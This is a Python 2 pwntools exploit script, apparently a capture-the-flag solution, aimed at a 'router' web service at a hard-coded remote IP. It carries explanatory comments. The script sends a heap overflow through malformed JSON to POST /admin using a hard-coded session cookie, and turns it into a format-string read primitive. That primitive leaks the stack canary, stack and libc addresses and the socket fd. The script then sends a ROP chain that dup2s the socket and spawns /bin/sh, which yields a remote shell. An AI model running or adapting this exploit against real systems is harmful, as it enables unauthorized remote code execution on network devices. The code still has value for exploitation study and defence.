#!/usr/bin/env python2
from pwn import *
# Target binary and the libc to resolve symbols against; ELF(), context and
# args come from the pwntools star-import above.
exe = context.binary = ELF("./router")
# With args.REMOTE the shipped ./libc.so is used, otherwise the libc the local
# loader picks for the binary.
libc = ELF("./libc.so") if args.REMOTE else exe.libc
# Address constants reused by the functions below. The names suggest a heap
# chunk located at the end of the GOT and the offset of user data inside a
# chunk; both are properties of the binary, not derivable from this file.
# (A Full-RELRO build would leave the GOT read-only at runtime.)
got_end_chunk = 0x60f185
data_offset = 0x10 + 1
# Build and send one HTTP POST /admin whose JSON body carries oversized string
# values, then hand back the still-open connection.
#   target_chunk, target_size: values fit() places at offsets 0x10 and 0x8 of the
#                              overflowing string (target_size gets bit 0 set).
#   data: bytes appended after the padding as the last string value.
#   json: extra JSON members spliced into the body before the closing brace.
#   p:    when true, pause() before sending (debugger attach point).
# Returns the pwntools tube; the caller owns it (see the `with` / close() uses
# below). The body's indentation was lost in this paste.
def heap_overflow(target_chunk, target_size, data, json="", p=False):
conn = remote("51.15.88.183", 8080) if args.REMOTE else remote("localhost", 8080)
if p:
pause()
# Filler size is chosen so it never equals target_size.
filler = 0x50 if target_size != 0x50 else 0x40
objsize = "o" * 0x20
small1 = "x" * 0x10  # assigned but not used below
small2 = "c" * (filler - 0x10)
small3 = "d" * (target_size - 0x10)
# small2 with one byte dropped, then 0x7f, then fit() placing target_size|1 at
# +0x8 and target_chunk at +0x10 of the overflowing value. The offsets mirror a
# malloc chunk header (size word with its low bit set) — inferred from the
# layout; confirm against the allocator the server uses.
overflow = small2.replace("c", "e")[:-1] + "\x7f" + fit({
0x8: target_size | 0x1,
0x10: target_chunk,
})
# Python 2 byte string: "\u" is not an escape here, so this is the literal
# 12-character JSON escape text \ud8ff\uffff. How the server's JSON decoder
# treats that invalid surrogate pair is not visible in this file (the name
# suggests it emits no bytes) — TODO confirm.
write_nothing = "\ud8ff\uffff"
# Relies on Python 2 integer `/`; under Python 3 this is a float and the
# string multiplication raises TypeError.
padding = write_nothing * ((target_size - 0x10) / 10)
padding += "\x7f"
data = padding + data
# Deliberately malformed JSON: a bare `1` after the first value, a repeated
# numeric key 0, missing commas. A strict JSON parser rejects such a body
# outright; whether the server's parser is lenient is not shown here.
payload = '''
{ "%(objsize)s": "%(objsize)s"1
0: "%(small2)s"
0: "%(small3)s"
0: "%(overflow)s"
"%(small3)s": 0,
0: "%(data)s",
%(json)s
}''' % locals()
# Raw HTTP/1.1 request with a hard-coded session cookie (i.e. the request
# assumes an already authenticated admin session). Content-Length is computed
# from the payload and line breaks are normalised to CRLF before sending.
request = '''
POST /admin HTTP/1.1
Host: aaa
Content-Type: application/json
Cookie: sessionid=0b71662a3b766be303db07f68a0f497090a7e15060eac6a75aab6643c74b15c9
Content-Length: {}
{}
'''.strip().replace("\n", "\r\n").format(len(payload), payload)
conn.send(request)
return conn
# Send one heap_overflow() whose data block overwrites a region starting at
# got_end_chunk + data_offset with pointers keyed on exe symbol offsets.
#   s:   string placed at data_start + 0x100 (NUL-terminated).
#   arg: value written into the slot at the success_settings_saved symbol.
# The "%2$s" string and the template/content symbol names suggest the server
# later consumes that region as a printf-style format string and argument;
# this is inferred from the names, not visible in this file. Returns the open
# connection from heap_overflow() (caller must close it).
def do_printf(s, arg=0xdeadbeef):
data_start = got_end_chunk + data_offset
# fit() keys are offsets relative to data_start, so each value lands exactly
# on the named symbol.
data = fit({
(exe.symbols.body_template - data_start): data_start + 0x100,
(exe.symbols.success_settings_saved - data_start): arg,
(exe.symbols.http200ok_content - data_start): data_start + 0x100 - 8,
(exe.symbols.settings_template - data_start): 0x40BEF8,
0x100 - 8: "%2$s\0",
0x100: s + "\0",
})
# 0x70-byte target; the extra JSON members look like the settings form fields
# the /admin handler expects.
return heap_overflow(got_end_chunk, 0x70, data, json='''
"ssid": "",
"bssid": "",
"dns": ""
''')
# pwntools MemLeak wrapper: each call reads one string from `addr` via
# do_printf; MemLeak then provides typed readers such as .u64() (used on the
# fwrite GOT entry below). context.quiet suppresses the per-connection log
# lines. Returns None (no read) for addresses below 0x400000 and for addresses
# whose 8-byte little-endian form contains '"', which would terminate the JSON
# string value it is embedded in.
@MemLeak
@context.quiet
def leak(addr):
if addr < 0x400000: return None
if '"' in p64(addr): return None
# Everything before the ENDOFDATA marker is the leaked string; the appended
# "\0" stands for the terminator a %s read stops at but does not copy.
with do_printf("%sENDOFDATA\n", addr) as c:
return c.recvuntil("ENDOFDATA\n", drop=True) + "\0"
# --- Script body: three leaks, then one final overflow. Indentation of the
# `with` blocks was lost in the paste. ---
# Varargs slot 19 read as hex: the stack canary. This connection is closed
# explicitly; the later ones use `with`.
c = do_printf("%19$llx\n")
cookie = int(c.recvline(), 16)
success("stack cookie: %#x", cookie)
c.close()
# Varargs slot 22: a stack address used as the base for the final write.
with do_printf("%22$llx\n") as c:
stack_leak = int(c.recvline(), 16)
success("stack leak: %#x", stack_leak)
# Four bytes at stack_leak + 0x5c, right-padded with NULs, read as a u32: the
# file descriptor of the client socket (that it is the socket is implied by
# the dup2 calls below, not shown directly).
with do_printf("%sENDDATA\n", stack_leak + 0x5c) as c:
socket = u32(c.recvuntil("ENDDATA\n", drop=True).ljust(4, "\0"))
success("socket: %d", socket)
# libc base = resolved fwrite GOT entry minus fwrite's offset inside libc.
libc.address += leak.u64(exe.got.fwrite) - libc.symbols.fwrite
# Fixed gadget addresses in the non-PIE executable (a PIE build would
# invalidate them).
pop_rdi = 0x000000000040a0f3 # pop rdi; ret
pop_rsi = 0x000000000040a0f1 # pop rsi; pop r15; ret
stack_chunk = stack_leak - 0x28
# Final data block: the leaked canary first (so the stack check still passes),
# then a return chain that dup2()s the client socket onto fds 1, 2 and 0,
# calls system() on the "/bin/sh" string placed at stack_chunk + 0x100, and
# exit(0)s. From the host side this looks like the router service process
# spawning a shell whose standard fds point at a network socket — a useful
# detection signature; seccomp or a no-exec policy on the service would block
# this stage even with the canary leaked.
payload = fit({
0x20 - data_offset: [
cookie,
p64(0xdeadba5e),
pop_rdi,
p64(socket),
pop_rsi,
p64(0x1),
p64(0x1),
p64(libc.symbols.dup2),
pop_rdi,
p64(socket),
pop_rsi,
p64(0x2),
p64(0x2),
p64(libc.symbols.dup2),
pop_rdi,
p64(socket),
pop_rsi,
p64(0x0),
p64(0x0),
p64(libc.symbols.dup2),
pop_rdi,
p64(stack_chunk + 0x100),
p64(libc.symbols.system),
pop_rdi,
p64(0x0),
p64(libc.symbols.exit),
],
0x100 - data_offset: "/bin/sh\n\0",
})
# Last request targets the stack chunk with a 0x40-byte size; the extra JSON
# member "0: 0" keeps the body shape used by the earlier requests.
with heap_overflow(stack_chunk, 0x40, payload, json= "0: 0") as c:
c.interactive()